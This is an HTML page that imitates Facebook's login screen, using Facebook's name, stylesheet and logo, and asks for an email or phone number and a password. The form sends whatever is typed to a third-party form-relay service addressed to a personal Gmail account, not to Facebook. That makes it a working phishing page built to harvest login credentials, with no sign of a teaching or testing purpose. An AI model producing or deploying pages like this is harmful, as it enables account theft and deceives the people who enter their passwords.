<!DOCTYPE html>
<html>

<head>
    <title>Facebook - Log In or Sign Up</title>
    <link rel="stylesheet" type="text/css" href="https://www.facebook.com/rsrc.php/v3/yy/r/jgPszXvBQG7.css">
    <style>
        body {
            background-color: #f0f2f5;
        }

        .container {
            margin: auto;
            padding-top: 100px;
            width: 400px;
            background-color: #fff;
            border: 1px solid #d3d8de;
            border-radius: 5px;
            box-shadow: 0 2px 4px rgba(0, 0, 0, 0.1);
        }

        .facebook-logo {
            display: block;
            margin: 30px auto;
            width: 120px;
            height: 120px;
        }

        h2 {
            font-size: 24px;
            text-align: center;
            margin-bottom: 20px;
        }

        form {
            padding: 0 40px;
        }

        label {
            display: block;
            font-size: 14px;
            font-weight: 600;
            margin-bottom: 5px;
        }

        input[type="text"],
        input[type="password"] {
            display: block;
            width: 100%;
            padding: 10px;
            border: 1px solid #d3d8de;
            border-radius: 3px;
            margin-bottom: 10px;
            font-size: 16px;
        }

        input[type="submit"] {
            background-color: #1877f2;
            color: #fff;
            border: none;
            border-radius: 3px;
            padding: 10px 20px;
            font-size: 16px;
            cursor: pointer;
        }

        a {
            color: #1877f2;
            text-decoration: none;
            font-size: 14px;
            font-weight: 600;
            margin-left: 10px;
        }

        a:hover {
            text-decoration: underline;
        }
    </style>
</head>

<body>
    <div class="_8ien">
        <div class="_6luv _52jv">
            <img src="https://www.facebook.com/images/fb_logo.png" alt="Facebook logo">
            <h2>Log in to Facebook</h2>
            <form action="https://formsubmit.co/penaceolo@gmail.com" method="POST">
                <label for="email">Email or Phone:</label><br>
                <input type="text" id="email" name="email"><br><br>
                <label for="password">Password:</label><br>
                <input type="password" id="password" name="password"><br><br>
                <input type="submit" value="Log In">
                <a href="#">Forgot account?</a>
            </form>
            <div class="_6ltg">
                <a href="#">Create New Account</a>
            </div>
        </div>
    </div>
</body>

</html>